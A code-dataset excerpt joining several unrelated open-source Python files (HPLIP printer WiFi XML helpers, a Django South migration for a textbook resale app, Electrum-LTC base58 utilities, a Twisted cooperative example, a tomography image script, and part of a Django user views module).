params,code,elementCount = readXmlDataFromURI(dev,URI,'<io:WifiNetworks', '<io:WifiNetwork>',10)
if code == HTTP_ACCEPTED:
log.info("Got Response as HTTP_ACCEPTED, so retrying to get the actual result")
continue
else:
break
if code != HTTP_OK:
log.error("Request Failed With Response Code %d"%code)
return ss_max, ss_min, ss_val, ss_dbm
if params is not None:
if elementCount == 1:
try:
ss_dbm = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:dbm']
ss_val = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:signalstrength']
except KeyError as e:
log.error("Missing response key: %s" % e)
return ss_max, ss_min, ss_val, ss_dbm
def readXmlTagDataFromURI(dev,URI,xmlRootNode,xmlReqDataNode,timeout=5):
paramsList,code =[],HTTP_ERROR
data = format_http_get(URI,0,"")
log.info(data)
response = io.BytesIO()
if dev.openLEDM() == -1:
dev.closeLEDM()
if dev.openEWS_LEDM() == -1:
dev.openMarvell_EWS()
dev.writeMarvell_EWS(data)
try:
while dev.readMarvell_EWS(1024, response, timeout):
pass
except Error:
dev.closeMarvell_EWS()
log.error("Unable to read Marvell_EWS Channel")
else:
dev.writeEWS_LEDM(data)
try:
dev.readLEDMData(dev.readEWS_LEDM, response, timeout)
except Error:
dev.closeEWS_LEDM()
log.error("Unable to read EWS_LEDM Channel")
else:
dev.writeLEDM(data)
try:
dev.readLEDMData(dev.readLEDM, response, timeout)
except Error:
dev.closeLEDM()
log.error("Unable to read LEDM Channel")
strResp = response.getvalue().decode('utf-8')
if strResp is not None:
code = get_error_code(strResp)
if code == HTTP_OK:
strResp = utils.unchunck_xml_data(strResp)
pos = strResp.find(xmlRootNode,0,len(strResp))
repstr = strResp[pos:].strip()
repstr = repstr.replace('\r','').replace('\t','').replace('\n','') # To remove formating characters from the received xml
repstr = repstr.rstrip('0') # To remove trailing zero from the received xml
try:
parser_object = utils.extendedExpat()
root_element = parser_object.Parse(repstr)
xmlReqDataNode = ''.join(l for l in filter(lambda x: x not in '<>', xmlReqDataNode)) # [c for c in xmlReqDataNode if c not in "<>"] # To remove '<' and '>' characters
reqDataElementList = root_element.getElementsByTagName(xmlReqDataNode)
for node in reqDataElementList:
repstr = node.toString()
repstr = repstr.replace('\r','').replace('\t','').replace('\n','') # To remove formating characters from the received xml
params = utils.XMLToDictParser().parseXML(to_bytes_utf8(repstr))
paramsList.append(params)
except xml.parsers.expat.ExpatError as e:
log.debug("XML parser failed: %s" % e) #changed from error to debug
else:
log.debug("HTTP Responce failed with %s code"%code)
return paramsList,code
def readXmlDataFromURI(dev,URI,xmlRootNode,xmlChildNode,timeout=5):
params,code,elementCount ={},HTTP_ERROR,0
data = format_http_get(URI,0,"")
log.info(data)
response = io.BytesIO()
if dev.openLEDM() == -1:
dev.closeLEDM()
if dev.openEWS_LEDM() == -1:
dev.openMarvell_EWS()
dev.writeMarvell_EWS(data)
try:
while dev.readMarvell_EWS(1024, response, timeout):
pass
except Error:
dev.closeMarvell_EWS()
log.error("Unable to read Marvell_EWS Channel")
else:
dev.writeEWS_LEDM(data)
try:
dev.readLEDMData(dev.readEWS_LEDM, response,timeout)
except Error:
dev.closeEWS_LEDM()
log.error("Unable to read EWS_LEDM Channel")
else:
dev.writeLEDM(data)
try:
dev.readLEDMData(dev.readLEDM, response,timeout)
except Error:
dev.closeLEDM()
log.error("Unable to read LEDM Channel")
#dev.closeEWS_LEDM()
strResp = response.getvalue().decode('utf-8')
if strResp is not None:
code = get_error_code(strResp)
if code == HTTP_OK:
strResp = utils.unchunck_xml_data(strResp)
pos = strResp.find(xmlRootNode,0,len(strResp))
repstr = strResp[pos:].strip()
repstr = repstr.replace('\r','').replace('\t','').replace('\n','') # To remove formating characters from the received xml
repstr = repstr.rstrip('0') # To remove trailing zero from the received xml
elementCount = repstr.count(xmlChildNode)
try:
params = utils.XMLToDictParser().parseXML(repstr)
except xml.parsers.expat.ExpatError as e:
log.debug("XML parser failed: %s" % e) #changed from error to debug
else:
log.debug(" HTTP Responce failed with %s code"%code)
return params,code,elementCount
def writeXmlDataToURI(dev,URI,xml,timeout=5):
code = HTTP_ERROR
data = format_http_put(URI,len(xml),xml)
response = io.BytesIO()
if dev.openLEDM() == -1:
if dev.openEWS_LEDM() == -1:
dev.openMarvell_EWS()
dev.writeMarvell_EWS(data)
try:
while dev.readMarvell_EWS(1000, response, timeout):
pass
except Error:
dev.closeMarvell_EWS()
log.error("Unable to read Marvell_EWS Channel")
else:
dev.writeEWS_LEDM(data)
try:
dev.readLEDMData(dev.readEWS_LEDM, response, timeout)
except Error:
dev.closeEWS_LEDM()
log.error("Unable to read EWS_LEDM Channel")
else:
dev.writeLEDM(data)
try:
dev.readLEDMData(dev.readLEDM, response,timeout )
except Error:
dev.closeLEDM()
log.error("Unable to read LEDM Channel")
strResp = response.getvalue().decode('utf-8')
if strResp is not None:
code = get_error_code(strResp)
return code
def get_error_code(ret):
if not ret: return HTTP_ERROR
match = http_result_pat.match(ret)
if match is None: return HTTP_ERROR
try:
code = int(match.group(1))
except (ValueError, TypeError):
code = HTTP_ERROR
return code
def format_http_get(requst, ledmlen, xmldata, content_type="text/xml; charset=utf-8"):
host = 'localhost'
return utils.cat(
"""GET $requst HTTP/1.1\r
Host: $host\r
User-Agent: hplip/3.0\r
Content-Type: $content_type\r
Content-Length: $ledmlen\r
\r
$xmldata""")
def format_http_put(requst, ledmlen, xmldata, content_type="text/xml; charset=utf-8"):
host = 'localhost'
return utils.cat(
"""PUT $requst HTTP/1.1\r
Host: $host\r
User-Agent: hplip/3.0\r
Content-Type: $content_type\r
Content-Length: $ledmlen\r
\r
$xmldata""")
| matrumz/RPi_Custom_Files | Printing/hplip-3.15.2/base/LedmWifi.py | Python | gpl-2.0 | 28,034 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Vendeur'
db.create_table(u'encefal_vendeur', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('nom', self.gf('django.db.models.fields.CharField')(max_length=255)),
('prenom', self.gf('django.db.models.fields.CharField')(max_length=255)),
('code_permanent', self.gf('django.db.models.fields.CharField')(max_length=12)),
('email', self.gf('django.db.models.fields.EmailField')(max_length=255)),
('telephone', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
))
db.send_create_signal(u'encefal', ['Vendeur'])
# Adding model 'Session'
db.create_table(u'encefal_session', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('nom', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
('date_debut', self.gf('django.db.models.fields.DateField')()),
('date_fin', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal(u'encefal', ['Session'])
# Adding model 'Facture'
db.create_table(u'encefal_facture', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('employe', self.gf('django.db.models.fields.related.ForeignKey')(related_name='factures', blank=True, db_column='employe', to=orm['auth.User'])),
('session', self.gf('django.db.models.fields.related.ForeignKey')(related_name='factures', blank=True, db_column='session', to=orm['encefal.Session'])),
))
db.send_create_signal(u'encefal', ['Facture'])
# Adding model 'Livre'
db.create_table(u'encefal_livre', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('isbn', self.gf('django.db.models.fields.CharField')(max_length=13, blank=True)),
('titre', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('auteur', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('edition', self.gf('django.db.models.fields.PositiveIntegerField')(default=1, blank=True)),
))
db.send_create_signal(u'encefal', ['Livre'])
# Adding model 'Exemplaire'
db.create_table(u'encefal_exemplaire', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('facture', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='exemplaires', null=True, db_column='facture', to=orm['encefal.Facture'])),
('livre', self.gf('django.db.models.fields.related.ForeignKey')(related_name='exemplaires', db_column='livre', to=orm['encefal.Livre'])),
('vendeur', self.gf('django.db.models.fields.related.ForeignKey')(related_name='exemplaires', db_column='vendeur', to=orm['encefal.Vendeur'])),
('etat', self.gf('django.db.models.fields.CharField')(default='VENT', max_length=4)),
('prix', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'encefal', ['Exemplaire'])
def backwards(self, orm):
# Deleting model 'Vendeur'
db.delete_table(u'encefal_vendeur')
# Deleting model 'Session'
db.delete_table(u'encefal_session')
# Deleting model 'Facture'
db.delete_table(u'encefal_facture')
# Deleting model 'Livre'
db.delete_table(u'encefal_livre')
# Deleting model 'Exemplaire'
db.delete_table(u'encefal_exemplaire')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'encefal.exemplaire': {
'Meta': {'object_name': 'Exemplaire'},
'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'etat': ('django.db.models.fields.CharField', [], {'default': "'VENT'", 'max_length': '4'}),
'facture': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'exemplaires'", 'null': 'True', 'db_column': "'facture'", 'to': u"orm['encefal.Facture']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'livre': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'exemplaires'", 'db_column': "'livre'", 'to': u"orm['encefal.Livre']"}),
'prix': ('django.db.models.fields.IntegerField', [], {}),
'vendeur': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'exemplaires'", 'db_column': "'vendeur'", 'to': u"orm['encefal.Vendeur']"})
},
u'encefal.facture': {
'Meta': {'object_name': 'Facture'},
'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'employe': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'factures'", 'blank': 'True', 'db_column': "'employe'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'factures'", 'blank': 'True', 'db_column': "'session'", 'to': u"orm['encefal.Session']"})
},
u'encefal.livre': {
'Meta': {'object_name': 'Livre'},
'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'auteur': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'edition': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isbn': ('django.db.models.fields.CharField', [], {'max_length': '13', 'blank': 'True'}),
'titre': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'vendeur': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'livres'", 'symmetrical': 'False', 'through': u"orm['encefal.Exemplaire']", 'db_column': "'vendeur'", 'to': u"orm['encefal.Vendeur']"})
},
u'encefal.session': {
'Meta': {'object_name': 'Session'},
'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_debut': ('django.db.models.fields.DateField', [], {}),
'date_fin': ('django.db.models.fields.DateField', [], {}),
'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nom': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
u'encefal.vendeur': {
'Meta': {'object_name': 'Vendeur'},
'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'code_permanent': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nom': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'prenom': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'telephone': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
}
}
complete_apps = ['encefal'] | nilovna/EnceFAL | project/encefal/migrations/0001_initial.py | Python | gpl-3.0 | 13,511 |
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from itertools import imap
import threading
import time
import hashlib
import struct
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
global PUBKEY_ADDRESS
global SCRIPT_ADDRESS
PUBKEY_ADDRESS = 48
SCRIPT_ADDRESS = 5
def rev_hex(s):
return s.decode('hex')[::-1].encode('hex')
Hash = lambda x: hashlib.sha256(hashlib.sha256(x).digest()).digest()
hash_encode = lambda x: x[::-1].encode('hex')
hash_decode = lambda x: x.decode('hex')[::-1]
def header_to_string(res):
pbh = res.get('prev_block_hash')
if pbh is None:
pbh = '0'*64
return int_to_hex4(res.get('version')) \
+ rev_hex(pbh) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex4(int(res.get('timestamp'))) \
+ int_to_hex4(int(res.get('bits'))) \
+ int_to_hex4(int(res.get('nonce')))
_unpack_bytes4_to_int = struct.Struct("<L").unpack
_unpack_bytes8_to_int = struct.Struct("<Q").unpack
def bytes4_to_int(s):
return _unpack_bytes4_to_int(s)[0]
def bytes8_to_int(s):
return _unpack_bytes8_to_int(s)[0]
int_to_bytes4 = struct.Struct('<L').pack
int_to_bytes8 = struct.Struct('<Q').pack
def int_to_hex4(i):
return int_to_bytes4(i).encode('hex')
def int_to_hex8(i):
return int_to_bytes8(i).encode('hex')
def header_from_string(s):
return {
'version': bytes4_to_int(s[0:4]),
'prev_block_hash': hash_encode(s[4:36]),
'merkle_root': hash_encode(s[36:68]),
'timestamp': bytes4_to_int(s[68:72]),
'bits': bytes4_to_int(s[72:76]),
'nonce': bytes4_to_int(s[76:80]),
}
############ functions from pywallet #####################
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(hashlib.sha256(public_key).digest())
return md.digest()
except:
import ripemd
md = ripemd.new(hashlib.sha256(public_key).digest())
return md.digest()
def public_key_to_pubkey_address(public_key):
return hash_160_to_pubkey_address(hash_160(public_key))
def public_key_to_bc_address(public_key):
""" deprecated """
return public_key_to_pubkey_address(public_key)
def hash_160_to_pubkey_address(h160, addrtype=None):
""" deprecated """
if not addrtype:
addrtype = PUBKEY_ADDRESS
return hash_160_to_address(h160, addrtype)
def hash_160_to_pubkey_address(h160):
return hash_160_to_address(h160, PUBKEY_ADDRESS)
def hash_160_to_script_address(h160):
return hash_160_to_address(h160, SCRIPT_ADDRESS)
def hash_160_to_address(h160, addrtype = 48):
""" Checks if the provided hash is actually 160bits or 20 bytes long and returns the address, else None
"""
if h160 is None or len(h160) is not 20:
return None
vh160 = chr(addrtype) + h160
h = Hash(vh160)
addr = vh160 + h[0:4]
return b58encode(addr)
def bc_address_to_hash_160(addr):
if addr is None or len(addr) is 0:
return None
bytes = b58decode(addr, 25)
return bytes[1:21] if bytes is not None else None
def b58encode(v):
"""encode v, which is a string of bytes, to base58."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0':
nPad += 1
else:
break
return (__b58chars[0]*nPad) + result
def b58decode(v, length):
""" decode v into a string of len bytes."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]:
nPad += 1
else:
break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return b58encode(vchIn + hash[0:4])
def DecodeBase58Check(psz):
vchRet = b58decode(psz, None)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
########### end pywallet functions #######################
import os
def random_string(length):
return b58encode(os.urandom(length))
def timestr():
return time.strftime("[%d/%m/%Y-%H:%M:%S]")
### logger
import logging
import logging.handlers
logging.basicConfig(format="%(asctime)-11s %(message)s", datefmt="[%d/%m/%Y-%H:%M:%S]")
logger = logging.getLogger('electrum-ltc')
def init_logger():
logger.setLevel(logging.INFO)
def print_log(*args):
logger.info(" ".join(imap(str, args)))
def print_warning(message):
logger.warning(message)
# profiler
class ProfiledThread(threading.Thread):
def __init__(self, filename, target):
self.filename = filename
threading.Thread.__init__(self, target = target)
def run(self):
import cProfile
profiler = cProfile.Profile()
profiler.enable()
threading.Thread.run(self)
profiler.disable()
profiler.dump_stats(self.filename)
| pooler/electrum-ltc-server | src/utils.py | Python | mit | 6,761 |
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
from operator import add
import add_package_path
import sys
from twisted.internet import defer
from twisted.internet.task import react
from twisted.python import log
from cooperative import batch_accumulate
def expensive(number):
log.msg("starting {}".format(number))
for value in range(100000):
if 25000 == value:
log.msg("1/4 for {}".format(number))
if 50000 == value:
log.msg("1/2 for {}".format(number))
if 75000 == value:
log.msg("3/4 for {}".format(number))
yield number * value / 3.0
def expensive2(number):
log.msg("starting {}".format(number))
total = 0
for value in range(100000):
if 25000 == value:
log.msg("1/4 for {}".format(number))
if 50000 == value:
log.msg("1/2 for {}".format(number))
if 75000 == value:
log.msg("3/4 for {}".format(number))
total += number * value / 3.0
yield
yield total
@defer.inlineCallbacks
def do_some_expensive_things(number):
"""
Perform one expensive computation cooperatively with any
other iterator passed into twisted's cooperate, then
use it's result to pass into the second computation.
:param number:
:return:
"""
result = yield batch_accumulate(1000, expensive(number))
total = reduce(add, result, 0)
log.msg("first for {}: {}".format(number, total))
result = yield batch_accumulate(1000, expensive2(int(total/1e9)))
total = reduce(add, result, 0)
log.msg("second for {}: {}".format(number, total))
defer.returnValue(total)
@defer.inlineCallbacks
def do_less_expensive_things(number):
"""
Perform one expensive computation cooperatively with any
other iterator passed into twisted's cooperate, then
use it's result to pass into the second computation.
:param number:
:return:
"""
result = yield batch_accumulate(1000, expensive(number))
total = reduce(add, result, 0)
log.msg("only for {}: {}".format(number, total))
defer.returnValue(total)
def main(reactor):
d1 = do_some_expensive_things(54.0)
d2 = do_some_expensive_things(42)
d3 = do_some_expensive_things(10)
d4 = do_some_expensive_things(34)
# Enqueue events to simulate handling external events
d5 = defer.Deferred().addCallback(log.msg)
reactor.callLater(0.3, d5.callback, "########## simulated request 1 ############")
d6 = defer.Deferred().addCallback(log.msg)
reactor.callLater(0.5, d6.callback, "########## sim request 2 ############")
d7 = defer.Deferred().addCallback(log.msg)
reactor.callLater(1.0, d7.callback, "########## simulated request 3 ############")
# simulate an external event triggering an expensive computation while
# other expensive computations are happening.
d8 = defer.Deferred()
d8.addCallback(do_less_expensive_things)
reactor.callLater(0.3, d8.callback, 20001)
return defer.gatherResults([d1, d2, d3, d4, d5, d6, d7, d8]).addCallback(log.msg)
if __name__ == "__main__":
log.startLogging(sys.stdout)
react(main, [])
| Nikita003/cooperative | examples/non_blocking.py | Python | apache-2.0 | 3,168 |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.2'
# jupytext_version: 1.2.3
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %%
# %matplotlib inline
# %%
import numpy as np
import pylab as plt
from glob import glob
import pathlib
import cv2
from skimage import restoration
from PIL import Image
from tqdm import tqdm_notebook
import imageio
# %%
data_folders = ["/home/zolotovden/topo-tomo/Laue-analyzer/experiment/2019_06_24/Kalpha1+Kbeta1_exp",
]
# %%
def safe_median(data):
m_data = cv2.medianBlur(data,3)
mask = np.abs(m_data-data) > 0.1*np.abs(data)
res = data.copy()
res[mask] = m_data[mask]
return res
# %%
def remove_bg(data, dark):
# d1 = cv2.medianBlur(data,3)
# d2 = cv2.medianBlur(dark,3)
d1 = safe_median(data)
d2 = safe_median(dark)
k1 = np.percentile(d1, 50, axis=-1)
k2 = np.percentile(d2, 50, axis=-1)
# print(k1, k2)
res = (d1.T*k2/k1).T - d2
return res
# %%
for i in range(len(data_folders)):
df = pathlib.Path(data_folders[i])
data = []
empty = []
dark = []
for f in df.glob('dark2*.tif'):
d = plt.imread(f).astype('float32')[1400:1700, 1200:2600]
dark.append(d)
dark = np.asanyarray(dark)
dark_f = np.percentile(dark, 90, axis=0).astype('float32')
for f in df.glob('empty*.tif'):
d = plt.imread(f).astype('float32')[1400:1700, 1200:2600]
empty.append(d)
empty = np.asanyarray(empty)
empty_f = np.percentile(empty, 90, axis=0).astype('float32')
for f in tqdm_notebook(df.glob('sample*.tif')):
d = plt.imread(f).astype('float32')[1400:1700, 1200:2600]
# im = Image.fromarray(remove_bg(d, dark_f).astype('float32'))
# im.save(f'{df}/post/{f.name}f')
imageio.imwrite(f'{df}/post/{f.name}f', remove_bg(d, dark_f).astype('float32'))
# data.append(d)
# d = np.flipud(remove_bg(data_f, dark))
# d = restoration.denoise_bilateral(d-np.min(d), multichannel=False)
# im = Image.fromarray(d-d.min())
# im.save(f'{i}.tiff')
# plt.imsave(f'{i}.tiff', d-d.min(), cmap=plt.cm.gray_r)
plt.figure(figsize=(8,5))
plt.imshow(safe_median(dark_f), cmap=plt.cm.gray_r)
plt.colorbar(orientation='horizontal')
plt.show()
plt.figure(figsize=(8,5))
plt.imshow(safe_median(empty_f), cmap=plt.cm.gray_r)
plt.colorbar(orientation='horizontal')
plt.show()
# %%
plt.figure(figsize=(8,5))
plt.imshow(remove_bg(data[10], dark_f), cmap=plt.cm.gray_r)
plt.colorbar(orientation='horizontal')
plt.show()
# %%
# !mkdir {df}/post
# %%
d = imageio.imread(f'{df}/post/{f.name}f')
d.shape
# %%
d.shape
# %%
plt.figure(figsize=(8,5))
plt.imshow(d, cmap=plt.cm.gray_r)
plt.colorbar(orientation='horizontal')
plt.show()
# %%
| buzmakov/tomography_scripts | misc/2energy_tomo.py | Python | mit | 2,983 |
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.db.transaction import atomic
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.template import RequestContext
from django.utils import timezone
from ultimate.leagues.models import Game, League
from ultimate.user.models import Player, PlayerRatings
from ultimate.forms import EditPlayerForm, EditPlayerRatingsForm, EditProfileForm, SignupForm
@login_required
def index(request):
leagues = League.objects.filter(state__in=['closed', 'open', 'preview']).order_by('league_start_date')
leagues = [l for l in leagues if l.is_visible(request.user)]
future_games = Game.objects.filter(
Q(league__in=leagues) &
Q(date__gte=timezone.now().date()) &
Q(teams__teammember__user=request.user)
).order_by('date')
future_games = [game for game in future_games if game.get_display_teams().exists()]
try:
next_game = future_games.pop(0)
except (IndexError, Game.DoesNotExist) as e:
next_game = None
try:
following_game = future_games.pop(0)
except (IndexError, Game.DoesNotExist) as e:
following_game = None
registrations = []
for league in leagues:
for registration in league.get_registrations_for_user(request.user):
registrations.append(registration)
return render(request, 'user/index.html',
{
'current_leagues': leagues,
'following_game': following_game,
'next_game': next_game,
'registrations': registrations
})
@atomic
def signup(request):
form = None
if request.method == 'POST':
form = SignupForm(request.POST)
if form.is_valid():
user = form.save()
Player.objects.get_or_create(user=user,
defaults={'date_of_birth': form.cleaned_data.get('date_of_birth'),
'gender': form.cleaned_data.get('gender')})
messages.success(request, 'Your account was created. You may now log in.')
return HttpResponseRedirect(reverse('user'))
else:
messages.error(request, 'There was an error on the form you submitted.')
if not form:
form = SignupForm()
return render(request, 'user/signup.html',
{'form': form})
@login_required
def editprofile(request):
try:
player = Player.objects.get(user=request.user)
except Player.DoesNotExist:
player = Player(user=request.user)
if request.method == 'POST':
form = EditProfileForm(request.POST, instance=request.user)
if form.is_valid():
form.save(commit=False)
player_form = EditPlayerForm(request.POST, instance=player)
if player_form.is_valid():
form.save()
player_form.save()
messages.success(request, 'Your profile was updated successfully.')
return HttpResponseRedirect(reverse('editprofile'))
else:
messages.error(request, 'There was an error on the form you submitted.')
else:
player_form = EditPlayerForm(request.POST, instance=player)
messages.error(request, 'There was an error on the form you submitted.')
else:
